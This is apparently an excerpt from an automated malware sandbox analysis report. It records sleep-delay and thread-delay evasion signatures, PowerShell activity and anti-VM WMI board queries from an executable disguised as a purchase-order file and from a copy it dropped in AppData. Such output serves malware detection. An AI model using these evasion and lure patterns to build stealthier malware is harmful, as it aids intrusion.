                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394581
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5857Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2025Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeWindow / User API: threadDelayed 2977Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeWindow / User API: threadDelayed 6848Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 5053Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 4794Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 3599
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 6255
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 6788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5544Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep count: 32 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2400000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 4828Thread sleep count: 2977 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2399868s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2399748s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2399640s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 4828Thread sleep count: 6848 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2399531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2399419s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2399297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2399181s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2399063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2398938s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2398813s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2398688s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2398576s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2398396s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2398262s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2398101s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2397985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2397860s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2397735s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2397606s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2397485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2397360s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2397235s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2397110s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2396985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2396860s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2396735s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2396610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2396485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2396360s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2396235s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2396110s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2395985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2395860s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2395699s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2395336s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2395219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2395109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2394999s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2394891s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2394781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2394672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2394563s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2394453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2394342s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2394234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2394121s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2394000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2393891s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2393766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2393641s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408Thread sleep time: -2393531s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6724Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2400000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2399875s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6752Thread sleep count: 5053 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6752Thread sleep count: 4794 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2399765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2399656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2399546s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2399438s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2399328s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2399218s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2399107s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2398999s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2398891s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2398766s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2398656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2398547s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2398437s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2398327s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2398199s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2398078s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2397963s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2397731s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2397469s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2397359s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2397250s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2397141s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2397031s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2396922s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2396807s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2396702s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2396594s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2396484s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2396375s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2396266s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2396156s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2396047s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2395938s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2395797s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2395672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2395562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2395438s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2395313s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2395201s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2394969s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2394840s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2394734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2394625s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2394516s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2394406s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2394297s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2394188s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2394063s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160Thread sleep time: -2393953s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep count: 39 > 30
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -35971150943733603s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2400000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7064Thread sleep count: 3599 > 30
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2399891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7064Thread sleep count: 6255 > 30
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2399766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2399656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2399547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2399437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2399328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2399218s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2399108s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2399000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2398890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2398781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2398672s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2398562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2398453s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2398343s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2398234s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2398124s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2398015s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2397899s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2397789s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2397649s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2397540s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2397437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2397328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2397219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2397109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2396999s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2396890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2396781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2396669s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2396562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2396453s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2396344s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2396234s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2396125s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2396015s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2395905s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2395797s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2395687s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2395578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2395468s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2395359s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2395250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2395140s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2395031s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2394921s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2394812s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2394703s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432Thread sleep time: -2394581s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
